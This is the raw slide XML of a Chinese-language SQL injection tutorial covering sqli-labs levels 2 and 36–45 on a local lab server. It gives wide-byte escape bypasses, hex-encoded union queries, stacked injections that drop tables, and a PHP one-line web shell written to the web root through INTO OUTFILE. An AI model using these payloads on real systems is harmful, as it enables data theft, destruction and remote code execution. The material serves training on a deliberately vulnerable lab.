            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>发现有作用，可以进行注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>/Less-36/?id=1111%df‘   union select 1,2,3 --+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>接下来就是正常的注入流程了。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>完整演示：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1. http://127.0.0.1/sqli/Less-36/?id=1111%df‘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--+ 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>取出所有的库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2. http://127.0.0.1/sqli/Less-36/?id=1111%df‘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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>7365637572697479  --+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>取出所有的表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3. http://127.0.0.1/sqli/Less-36/?id=1111%df‘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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>7573657273  --+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>取出所有的字段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>4. http://127.0.0.1/sqli/Less-36/?id=1111%df‘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取出所有的字段的值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>注意：为什么一直强调能够使用十六进制的就使用十六进制，因为本关中单引号全部会被转义</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24523894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与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>34</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>关基本相似，本关只是将过滤函数进行了替换：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>mysql_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>，同样，我们可以直接按照</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>34</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>关的方法即可！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>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详见</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>34</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34806233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65B0A-86C6-41A5-8507-138EE8095630}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1878981" y="319669"/>
            <a:ext cx="10131425" cy="338254"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>补充知识</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>堆叠注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2321F4DD-BD71-4FC9-9A25-8BE466DED6A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="211873" y="769434"/>
            <a:ext cx="11798533" cy="5965901"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>我发现网上的资料很多都是抄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>-labs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>天书作者的，所以我们也参考</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>抄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>了大佬的文章：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> https://www.cnblogs.com/lcamry/p/5762905.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Stacked injections:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>堆叠注入。从名词的含义就可以看到应该是一堆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>语句（多条）一起执行。而在真实的运用中也是这样的，我们知道在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>中，主要是命令行中，每一条语句结尾加 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>stacked injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>我们可以在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>命令行中进行测试：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Select * from users; create table test1 like users;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Show tables;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Select * from users; drop table test1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Select * from users; select 1,2,3;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28745089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我们直接构造语句：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>http://127.0.0.1/sqli/Less-38/?id=1';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http://127.0.0.1/sqli/Less-38/?id=1'; drop table crow ; --+</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25511091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不相同的地方是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>语句的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>值处理：我们将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>38</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>id=‘ ’; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>修改为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>id= ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>即可</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>我们直接构造语句：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://127.0.0.1/sqli/Less-39/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>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http://127.0.0.1/sqli/Less-39/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> ; drop table crow ; --+</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10164239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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>39</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>不相同的地方是这里的错误不会回显，但是不影响我们注入测试，而且我们将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>修改为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>id=(‘ ’);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>我们直接构造语句：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>http://127.0.0.1/sqli/Less-40/?id=1');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http://127.0.0.1/sqli/Less-40/?id=1'); drop table crow ; --+</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15498178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和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>40</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>关相同，没有回显信息，但是不影响我们注入测试，而且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>值没有经过包裹；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>我们直接构造语句：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>http://127.0.0.1/sqli/Less-41/?id=1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http://127.0.0.1/sqli/Less-40/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> ; drop table crow ; --+</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="292890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896198" y="263236"/>
            <a:ext cx="10131425" cy="318655"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-2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436418" y="706582"/>
            <a:ext cx="1131916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/Less-2/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>’     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查看是否有注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2.   http://127.0.0.1/sqli/Less-2/?id=1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http://127.0.0.1/sqli/Less-2/?id=-1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5. http://127.0.0.1/sqli/Less-2/?id=-1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6.  http://127.0.0.1/sqli/Less-2/?id=-1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7. http://127.0.0.1/sqli/Less-2/?id=-1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8656123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当我们第一眼看到这个界面的时候，感觉和二次注入是不是有点像，但是这里和二次注入有一点不同：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>我们直接来到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>中，观察</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的处理问题：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>$username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysqli_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>($con1, $_POST["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>login_user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>"]);  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> $password = $_POST["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>login_password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>此时的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>为：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> "SELECT * FROM users WHERE username='$username' and password='$password'"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>我们可以看到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>没有经过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysqli_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>函数进行处理，所以这个时候我们在这个位置进行构造：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>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9482249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这一关和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>less42</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>非常像，区别就在于对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>值得处理：</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0442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本关和前面的基本是一样的，只是没有报错回显信息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859295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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>less43</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>关的基本是一样的，只是没有报错回显信息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28851156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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>总结</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>堆叠注入写一句话木马</a:t>
            </a:r>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192000" cy="5832764"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>在上面的关卡中，基本上都是在创建表，删除表，我的操作会让大家感觉堆叠注入好像没有什么太大的用处，我们利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>less45</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>来写一个一句话木马：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>一句话木马：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>&lt;?php   @eval($_POST[crow]); ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>绝对路径：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> C:\phpstudy\PHPTutorial\WWW\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>使用函数： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>select xxx into  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>outfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> xxx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>select '&lt;?php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a:t>';</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36972026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DF8D1-9C2A-42FC-8DB7-37C17B030451}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1923586" y="364273"/>
            <a:ext cx="10131425" cy="204439"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
